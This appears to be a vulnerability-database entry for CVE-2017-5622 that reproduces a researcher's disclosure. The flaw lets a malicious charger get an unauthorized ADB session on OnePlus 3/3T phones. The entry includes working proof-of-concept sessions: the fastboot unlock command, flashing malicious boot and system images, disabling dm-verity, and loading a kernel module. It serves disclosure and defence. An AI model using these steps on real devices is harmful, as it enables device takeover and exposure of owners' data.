Vulnerabilities > CVE-2017-5622 - Incorrect Default Permissions vulnerability in Oneplus Oxygenos 3.2.8/3.5.4/4.0.2
Attack vector
PHYSICAL Attack complexity
LOW Privileges required
LOW Confidentiality impact
HIGH Integrity impact
HIGH Availability impact
NONE Summary
With OxygenOS before 4.0.3, when a charger is connected to a powered-off OnePlus 3 or 3T device, the platform starts with adbd enabled. Therefore, a malicious charger or a physical attacker can open up, without authorization, an ADB session with the device, in order to further exploit other vulnerabilities and/or exfiltrate sensitive information.
Vulnerable Configurations
Part | Description | Count |
---|---|---|
OS | 3 | |
Hardware | 2 |
Common Weakness Enumeration (CWE)
Common Attack Pattern Enumeration and Classification (CAPEC)
- Accessing Functionality Not Properly Constrained by ACLs In applications, particularly web applications, access to functionality is mitigated by the authorization framework, whose job it is to map ACLs to elements of the application's functionality; particularly URL's for web apps. In the case that the administrator failed to specify an ACL for a particular element, an attacker may be able to access it with impunity. An attacker with the ability to access functionality not properly constrained by ACLs can obtain sensitive information and possibly compromise the entire application. Such an attacker can access resources that must be available only to users at a higher privilege level, can access management sections of the application or can run queries for data that he is otherwise not supposed to.
- Directory Indexing An adversary crafts a request to a target that results in the target listing/indexing the content of a directory as output. One common method of triggering directory contents as output is to construct a request containing a path that terminates in a directory name rather than a file name since many applications are configured to provide a list of the directory's contents when such a request is received. An adversary can use this to explore the directory tree on a target as well as learn the names of files. This can often end up revealing test files, backup files, temporary files, hidden files, configuration files, user accounts, script contents, as well as naming conventions, all of which can be used by an attacker to mount additional attacks.
- Footprinting An attacker engages in probing and exploration activity to identify constituents and properties of the target. Footprinting is a general term to describe a variety of information gathering techniques, often used by attackers in preparation for some attack. It consists of using tools to learn as much as possible about the composition, configuration, and security mechanisms of the targeted application, system or network. Information that might be collected during a footprinting effort could include open ports, applications and their versions, network topology, and similar information. While footprinting is not intended to be damaging (although certain activities, such as network scans, can sometimes cause disruptions to vulnerable applications inadvertently) it may often pave the way for more damaging attacks.
- Embedding Scripts within Scripts An attack of this type exploits a programs' vulnerabilities that are brought on by allowing remote hosts to execute scripts. The attacker leverages this capability to execute scripts to execute his/her own script by embedding it within other scripts that the target software is likely to execute. The attacker must have the ability to inject script into script that is likely to be executed. If this is done, then the attacker can potentially launch a variety of probes and attacks against the web server's local environment, in many cases the so-called DMZ, back end resources the web server can communicate with, and other hosts. With the proliferation of intermediaries, such as Web App Firewalls, network devices, and even printers having JVMs and Web servers, there are many locales where an attacker can inject malicious scripts. Since this attack pattern defines scripts within scripts, there are likely privileges to execute said attack on the host. Of course, these attacks are not solely limited to the server side, client side scripts like Ajax and client side JavaScript can contain malicious scripts as well. In general all that is required is for there to be sufficient privileges to execute a script, but not protected against writing.
- Web Logs Tampering Web Logs Tampering attacks involve an attacker injecting, deleting or otherwise tampering with the contents of web logs typically for the purposes of masking other malicious behavior. Additionally, writing malicious data to log files may target jobs, filters, reports, and other agents that process the logs in an asynchronous attack pattern. This pattern of attack is similar to "Log Injection-Tampering-Forging" except that in this case, the attack is targeting the logs of the web server and not the application.
Seebug
bulletinFamily | exploit |
description | Last month we [published](/2017/02/08/oneplus3-bootloader-vulns/) [CVE-2017-5626](/vulns/aleph-2017003) (patched in OxygenOS 4.0.2), a vulnerability which allowed attackers to effectively unlock a OnePlus 3/3T device (without a factory reset). Combining this with our also discovered [CVE-2017-5624](/vulns/aleph-2017002) (patched in OxygenOS 4.0.3) enabled a powerful attack against locked devices – persistent highly privileged code execution without any warning to the user and with access to user’s data (after the victim enters his credentials). One caveat from the attacker’s perspective, however, is that it either required physical or an authorized-ADB access to the device. In this blog post we describe a new critical vulnerability [CVE-2017-5622](/vulns/aleph-2017004) in OnePlus 3/3T (OxygenOS 4.0.2 and below), which relaxes the attack prerequisites. Combining it with [CVE-2017-5626](/vulns/aleph-2017003) allows a malicious charger to **own your device if it’s hooked-up while being powered off** (the charger may also just wait until the battery is drained). Adding [CVE-2017-5624](/vulns/aleph-2017002) to the stack of exploited vulnerabilities will also help the attacker to hide the fact that he modified the device’s `system` partition. We had responsibly reported [CVE-2017-5622](/vulns/aleph-2017004) to OnePlus Security that later fixed it in OxygenOS 4.0.3, [released](https://forums.oneplus.net/threads/oxygenos-4-0-3-n-ota-for-oneplus-3.497080/) last month. We would like to thank OnePlus Security for the efficient manner in which they handled this critical security issue. ##### Demos First, before we dive into the technical details, here is a couple of video demonstrations of our PoCs. The first video presents how the ‘charger’ can exploit [CVE-2017-5622](/vulns/aleph-2017004) & [CVE-2017-5626](/vulns/aleph-2017003) for gaining a **root shell, putting SELinux in `permissive` mode, and even executing kernel code**: https://www.youtube.com/embed/tDRPWvYJYfU?rel=0?ecver=1 The second video shows how the ‘charger’ exploits [CVE-2017-5622](/vulns/aleph-2017004) , [CVE-2017-5624](/vulns/aleph-2017002) & [CVE-2017-5626](/vulns/aleph-2017003) for replacing the `system` partition in order to **install a privileged app**. Please note that once the replacement is complete, the victim has no indication that the device has been tampered with: https://www.youtube.com/embed/ZqCzPua0RCA?rel=0?ecver=1 ### Charger Boot Mode ADB Access (CVE-2017-5622) When one connects a powered off OnePlus 3/3T device to a charger, the bootloader will load the platform with the `charger` boot mode (in other words: `ro.bootmode = charger`). The platform of course MUST NOT enable any sensitive USB interfaces because otherwise it could be attacked by malicious chargers, an attack also-known-as [‘Juice-jacking’](https://krebsonsecurity.com/2011/08/beware-of-juice-jacking/). Much to our surprise, when we first connected our powered off OnePlus 3/3T devices, we noticed that we had ADB access: ``` > adb shell android:/ $ id uid=2000(shell) gid=2000(shell) groups=2000(shell),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc) context=u:r:shell:s0 android:/ $ getprop ro.bootmode charger android:/ $ getprop ro.boot.mode charger android:/ $ getprop | grep -i oxygen [ro.oxygen.version]: [4.0.2] android:/ $ ``` Since this does not (and should not!) normally happen when you connect a powered off Android device to a charger, we were quite puzzled. We had two immediate questions in mind: ### Question 1: Why is ADB running? The answer to this question lies within the Android boot process, during which `init` executes several scripts under the `boot` partition. By running `ps`, it can be seen that `init` is the parent of `adbd`: ``` android:/ $ ps -x | grep adb shell 444 1 12324 564 poll_sched 0000000000 S /sbin/adbd (u:2, s:10) android:/ $ ps -x |grep init root 1 0 15828 2496 SyS_epoll_ 0000000000 S /init (u:6, s:102) ``` Thus some `init` script instruction starts `adbd` when the platform runs in the `charger` boot mode. Taking a look at `init.qcom.usb.rc` reveals the following: ``` on charger [...] mkdir /dev/usb-ffs/adb 0770 shell shell mount functionfs adb /dev/usb-ffs/adb uid=2000,gid=2000 write /sys/class/android_usb/android0/f_ffs/aliases adb setprop persist.sys.usb.config adb setprop sys.usb.configfs 0 setprop sys.usb.config adb [...] ``` The `on charger` event is triggered if `ro.bootmode == charger`, as can be seen from Android 7.1.1’s [init.cpp](https://android.googlesource.com/platform/system/core/+/android-7.1.1_r24/init/init.cpp): ``` [...] std::string bootmode = property_get("ro.bootmode"); if (bootmode == 'charger') { am.QueueEventTrigger('charger'); } else { am.QueueEventTrigger("late-init"); } [...] ``` Therefore, the `sys.usb.config` property changes to `adb`, which then instructs `init` to run `adbd`, under `init.usb.rc`: ``` [...] on property:sys.usb.config=adb && property:sys.usb.configfs=0 write /sys/class/android_usb/android0/enable 0 write /sys/class/android_usb/android0/idVendor 2A70 #VENDOR_EDIT Anderson@, 2016/09/21, modify from 18d1 to 2A70 write /sys/class/android_usb/android0/idProduct 4EE7 write /sys/class/android_usb/android0/functions ${sys.usb.config} write /sys/class/android_usb/android0/enable 1 start adbd setprop sys.usb.state ${sys.usb.config} [...] ``` #### Question 2: Where is the ADB Authorization? In order to protect against malicious USB ports (e.g. malicious chargers) targeting devices with `adbd` enabled, Android has had ADB authorization for quite some time (since Jelly-bean) – any attempt to gain an ADB session with an unauthorized device is now blocked. So what’s different in OnePlus 3/3T? First, let’s take a peek at the AOSP implementation of `adbd`. The `adbd_main` routine reveals that there is some global flag, `auth_required`, that controls the ADB authorization: ``` int adbd_main(int server_port) { [...] if (ALLOW_ADBD_NO_AUTH && property_get_bool("ro.adb.secure", 0) == 0) { auth_required = false; } [...] ``` This flag is then used by the `handle_new_connection` routine: ``` static void handle_new_connection(atransport* t, apacket* p) { [...] if (!auth_required) { handle_online(t); send_connect(t); } else { send_auth_request(t); } [...] } ``` We can thus deduce that if OxygenOS used the stock `adbd`, then `ro.adb.secure` would be `0`, however: ``` android:/ $ getprop ro.adb.secure 1 android:/ $ ``` Therefore, OxygenOS of OnePlus 3/3T contains a customized `adbd`! Since we don’t have the sources, we need to take a look at the binary. Decompiling it with IDA shows: ``` __int64 sub_400994() { [...] if ( !(unsigned __int8)sub_440798("ro.adb.secure", 0LL) ) auth_required_50E088 = 0; getprop("ro.wandrfmode", &v95, &byte_4D735C); if ( !(unsigned int)strcmp(&v95, &a0_1) || !(unsigned int)strcmp(&v95, &a1_1) || !(unsigned int)strcmp(&v95, &a2) ) auth_required_50E088 = 0; getprop("ro.boot.mode", &v94, &byte_4D735C); if ( !(unsigned int)strcmp(&v94, 'charger') ) auth_required_50E088 = 0; [...] } ``` We can clearly see that OnePlus has customized the AOSP `adbd` s.t. `auth_required = 0` when the platform is started in the `charger` bootmode. (_Bonus points_: `ro.wandrfmode` relates to [CVE-2017-5623](/vulns/aleph-2017005) .) ### Exploitation So what can we do with ADB access? First, we should note that although we can gain a shell, we do not have access to user data since the partition is both unmounted and encrypted. What we can do, however, is simply reboot into the `fastboot` mode by issuing `reboot bootloader`, and then replace the `boot` and/or `system` partitions by exploiting [CVE-2017-5626](/vulns/aleph-2017003) ! In order to remove any warning about the `system` partition modification, we may also exploit [CVE-2017-5624](/vulns/aleph-2017002) . It should be noted that if the device’s bootloader happens to be unlocked, then the charger does not even need [CVE-2017-5626](/vulns/aleph-2017003) . As a reminder, [CVE-2017-5626](/vulns/aleph-2017003) (`fastboot oem 4F500301`) allowed one with `fastboot` access to effectively unlock the device, disregarding `OEM Unlocking`, without user confirmation and without erasure of user data (which normally occurs after lock-state changes). Moreover, the device still reports it’s locked after running this command. Exploiting this vulnerability alone allows for kernel code execution albeit with a 5 seconds warning message. [CVE-2017-5624](/vulns/aleph-2017002) allowed the attacker, again with `fastboot` access, to disable `dm-verity`, a feature which protects against tampering with the `system` partition, for example. #### PoC 1: Charger Gains a root shell & Kernel Code Execution (CVE-2017-5622/6) The attack begins when the victim connects a powered off device to the ‘charger’, which gains an ADB session [CVE-2017-5622](/vulns/aleph-2017004) , and reboots the device into `fastboot`: ``` > adb shell android:/ $ id uid=2000(shell) gid=2000(shell) groups=2000(shell),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc) context=u:r:shell:s0 android:/ $ reboot bootloader > fastboot devices cb010b5a fastboot ``` By exploiting [CVE-2017-5626](/vulns/aleph-2017003) the ‘charger’ replaces the `boot` image s.t. `adbd` runs as `root` and SELinux is in `permissive` mode (see the previous blog post): ``` > fastboot flash boot evilboot.img target reported max download size of 440401920 bytes sending 'boot' (14836 KB)... OKAY [ 0.335s] writing 'boot'... FAILED (remote: Partition flashing is not allowed) finished. total time: 0.358s > fastboot oem 4F500301 ... OKAY [ 0.020s] finished. total time: 0.021s > fastboot flash boot evilboot.img target reported max download size of 440401920 bytes sending 'boot' (14836 KB)... OKAY [ 0.342s] writing 'boot'... OKAY [ 0.135s] finished. total time: 0.480s ``` That gives the charger a root shell, even before the user enters his credentials (but without access to user data!): ``` OnePlus3:/ # id uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc) context=u:r:su:s0 OnePlus3:/ # getenforce Permissive ``` The OnePlus 3/3T kernel is compiled with LKM enabled, so running kernel code does not even require patching / recompiling the kernel. So I created a tiny kernel module: ``` #include <linux/module.h> #include <linux/kdb.h> int init_module(void) { printk(KERN_ALERT "Hello From Evil LKM\n"); return 1; } ``` The charger can then load it into the kernel: ``` OnePlus3:/data/local/tmp # insmod ./evil.ko OnePlus3:/data/local/tmp # dmesg | grep "Evil LKM" [19700121_21:09:58.970409]@3 Hello From Evil LKM ``` #### PoC 2: Charger Replaces the system Partition (CVE-2017-5622/4/6) The vulnerabilities can be combined together for code execution in privileged SELinux domains, without any warning to the user and with access to original user data. In order to demonstrate this, I’ve modified the `system` partition, adding a privileged app. This can be done by placing an APK under `/system/priv-app/<APK_DIR>` which will eventually cause it to be added to the [priv_app domain](https://android.googlesource.com/platform/system/sepolicy/+/android-7.1.1_r16/priv_app.te). (Don’t foger to `chcon` your APK and its containing directory!) Again, the attack begins when the victim connects a powered off device to the ‘charger’, which gains an ADB session [CVE-2017-5622](/vulns/aleph-2017004) , and reboots the device into `fastboot`: ``` > adb shell android:/ $ id uid=2000(shell) gid=2000(shell) groups=2000(shell),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc) context=u:r:shell:s0 android:/ $ reboot bootloader > fastboot devices cb010b5a fastboot ``` By exploiting [CVE-2017-5626](/vulns/aleph-2017003) the ‘charger’ can replace the `system` partition with a malicious one: ``` > fastboot flash system evilsystem.img target reported max download size of 440401920 bytes erasing 'system'... FAILED (remote: Partition erase is not allowed) finished. total time: 0.014s > fastboot oem 4F500301 OKAY [ 0.020s] finished. total time: 0.021s > fastboot flash system evilsystem.img target reported max download size of 440401920 bytes erasing 'system'... OKAY [ 0.010s] ... sending sparse 'system' 7/7 (268486 KB)... OKAY [ 6.748s] writing 'system' 7/7... OKAY [ 3.291s] finished. total time: 122.675s ``` By exploiting [CVE-2017-5624](/vulns/aleph-2017002) the ‘charger’ can disable `dm-verity`: ``` > fastboot oem disable_dm_verity ... OKAY [ 0.034s] finished. total time: 0.036s ``` Indeed the app loads with the `priv_app` context: ``` 1|OnePlus3:/ $ getprop | grep dm_verity [ro.boot.enable_dm_verity]: [0] OnePlus3:/ $ ps -Z | grep evilapp u:r:priv_app:s0:c512,c768 u0_a16 4764 2200 1716004 74600 SyS_epoll_ 0000000000 S alephresearch.evilapp ``` ### Patch OnePlus has fixed the vulnerability by simply removing the ` { persist. } sys.usb.config ` related lines under the `on charger` event: ``` on charger #yfb add to salve binder error log in poweroff charge setrlimit 13 40 40 setprop sys.usb.config mass_storage mkdir /dev/usb-ffs 0770 shell shell mkdir /dev/usb-ffs/adb 0770 shell shell mount functionfs adb /dev/usb-ffs/adb uid=2000,gid=2000 write /sys/class/android_usb/android0/f_ffs/aliases adb #14(0xe) means reject cpu1 cpu2 cpu3online write /sys/module/msm_thermal/core_control/cpus_offlined 14 #add by [email protected] 2015/12/22, improve the performance of charging write /sys/devices/system/cpu/cpu0/cpufreq/scaling_governor powersave write /sys/devices/system/cpu/cpu1/online 0 write /sys/devices/system/cpu/cpu2/online 0 write /sys/devices/system/cpu/cpu3/online 0 #yfb add to salve binder error log in poweroff charge start srvmag_charger ``` # OnePlus 2 Last, OnePlus 2 also had the ` { persist } .sys.usb.config ` property set to `adb` under the `on charger` event of init.qcom.usb.rc: ``` on charger mkdir /dev/usb-ffs 0770 shell shell mkdir /dev/usb-ffs/adb 0770 shell shell mount functionfs adb /dev/usb-ffs/adb uid=2000,gid=2000 write /sys/class/android_usb/android0/f_ffs/aliases adb setprop persist.sys.usb.config adb [...] ``` And also under `init.rc`: ``` on charger mount ext4 /dev/block/bootdevice/by-name/system /system ro setprop sys.usb.configfs 0 load_system_props class_start charger setprop sys.usb.config adb ``` Despite that, when we hooked-up our OnePlus 2 device, we didn’t manage to obtain an `adb` shell, although the USB interface was up & running: ``` > adb shell error: device unauthorized. This adb server's $ADB_VENDOR_KEYS is not set Try 'adb kill-server' if that seems wrong. Otherwise check for a confirmation dialog on your device. > adb devices List of devices attached 6b3ef4d5 unauthorized ``` Thus, OnePlus 2 is not vulnerable – in contrast to the OnePlus 3/3T case, the OnePlus 2 OxygenOS image had the ADB authorization left intact. Disassembling its `adbd` binary shows that it indeed does not have the `ro.boot.mode` `auth_required` [bypass](#question-2-where-is-the-adb-authorization). |
id | SSV:92832 |
last seen | 2017-11-19 |
modified | 2017-03-27 |
published | 2017-03-27 |
reporter | Root |
title | OnePlus 3/3T open up an ADB session without authorization (CVE-2017-5622) |